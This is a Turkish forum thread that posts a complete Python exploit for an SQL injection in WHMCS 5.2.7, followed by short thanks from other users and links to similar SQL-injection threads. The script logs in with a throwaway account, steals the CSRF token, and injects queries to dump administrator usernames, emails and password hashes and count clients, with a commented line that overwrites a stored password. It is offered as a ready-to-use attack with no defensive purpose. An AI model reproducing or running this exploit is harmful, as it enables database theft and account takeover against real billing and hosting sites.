Konuyu Oyla:
  • Derecelendirme: 0/5 - 0 oy
  • 1
  • 2
  • 3
  • 4
  • 5
WHMCS 5.2.7 SQL Injection
#1
WHMCS 5.2.7 – SQL Injection açığnın kullanımana ilişkin youtube videoda kullanım şekli açıklanmıştır. Tam ekran olarak izlerseniz daha iyi görüntüleniyor. Açığı ilişkin python script ise şu şekilde;






Kod:
#!/usr/bin/env python
# 2013/10/03 - WHMCS 5.2.7 SQL Injection
# http://localhost.re/p/whmcs-527-vulnerability

url = 'http://clients.target.com/' # wopsie dopsie
user_email = 'mysuper@hacker.account' # just create a dummie account at /register.php
user_pwd = 'hacker'

import urllib, re, sys
from urllib2 import Request, urlopen
ua = "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.17 Safari/537.36"

def exploit(sql):
    print "Doing stuff: %s" % sql
    r = urlopen(Request('%sclientarea.php?action=details' % url, data="token=%s&firstname=%s&lastname=1&companyname=1&email=%s&paymentmethod=none&billingcid=0&address1=1&address2=1&city=1&state=1&postcode=1&country=US&phonenumber=1&save=Save+Changes" % (user[1], 'AES_ENCRYPT(1,1), firstname=%s' % sql, user_email), headers={"User-agent": ua, "Cookie": user[0]})).read()
    return re.search(r'(id="firstname" value="(.*?)")', r).group(2)

def login():
    print "Getting CSRF token"
    r = urlopen(Request('%slogin.php' % url, headers={"User-agent": ua}))
    csrf = re.search(r'(type="hidden" name="token" value="([0-9a-f]{40})")', r.read()).group(2)
    cookie = r.info()['set-cookie'].split(';')[0]
    print "Logging in"
    r = urlopen(Request('%sdologin.php' % url, data="username=%s&password=%s&token=%s" %(user_email, user_pwd, csrf), headers={"User-agent": ua, "Cookie": cookie})).read()
    if 'dologin.php' in r:
        sys.exit('Unable to login')
    else:
        return [cookie, re.search(r'(type="hidden" name="token" value="([0-9a-f]{40})")', r).group(2)]

user = login()
print exploit('(SELECT GROUP_CONCAT(id,0x3a,username,0x3a,email,0x3a,password SEPARATOR 0x2c20) FROM tbladmins)') # get admins
print exploit('(SELECT * FROM (SELECT COUNT(id) FROM tblclients) as x)') # just get a count of clients

# oh you want to be evil
#exploit("'DISASTER', password=(SELECT * FROM (SELECT password FROM tblclients WHERE email='%s' LIMIT 1) as x)#" % user_email)
- See more at: http://www.seo.mavi1.org/whmcs-5-2-7-sql-injection-acigi.html#sthash.RK5sqeNw.dpuf
Beğenenler:
#2
Elinize sağlık.
Beğenenler:
#3
benim izlerken dikkatimi çekti 2 sayfa vardı çok fazla site yok dogrumu?
Beğenenler:

Konu ile Alakalı Benzer Konular
Konular Yazar Yorumlar Okunma Son Yorum
  創意細胞 SQL Injection H4Sec 27 747 10-03-2016, Saat: 18:37
Son Yorum: byhacı
  Israelian CMS Blind SQL Injection Vulnerability H4Sec 16 1,108 01-03-2016, Saat: 03:59
Son Yorum: Zany
  Joomla Nice Ajax Poll 1.4.0 SQL Injection ERTUĞRUL 0 123 12-12-2015, Saat: 03:08
Son Yorum: ERTUĞRUL
  Grow-Easy CMS SQL Injection Vulnerability Stallk3r 7 459 16-08-2015, Saat: 04:28
Son Yorum: comertcimen
  Medical Website Design SQL Injection Vulnerability Stallk3r 9 646 05-08-2015, Saat: 13:43
Son Yorum: mavisimsek
Anahtar Kelimeler

WHMCS 5.2.7 SQL Injection indir, WHMCS 5.2.7 SQL Injection Videosu, WHMCS 5.2.7 SQL Injection Online izle, WHMCS 5.2.7 SQL Injection Bedava indir, WHMCS 5.2.7 SQL Injection Yükle, WHMCS 5.2.7 SQL Injection Hakkında, WHMCS 5.2.7 SQL Injection Nedir, WHMCS 5.2.7 SQL Injection Free indir, WHMCS 5.2.7 SQL Injection Oyunu, WHMCS 5.2.7 SQL Injection Download


1 Ziyaretçi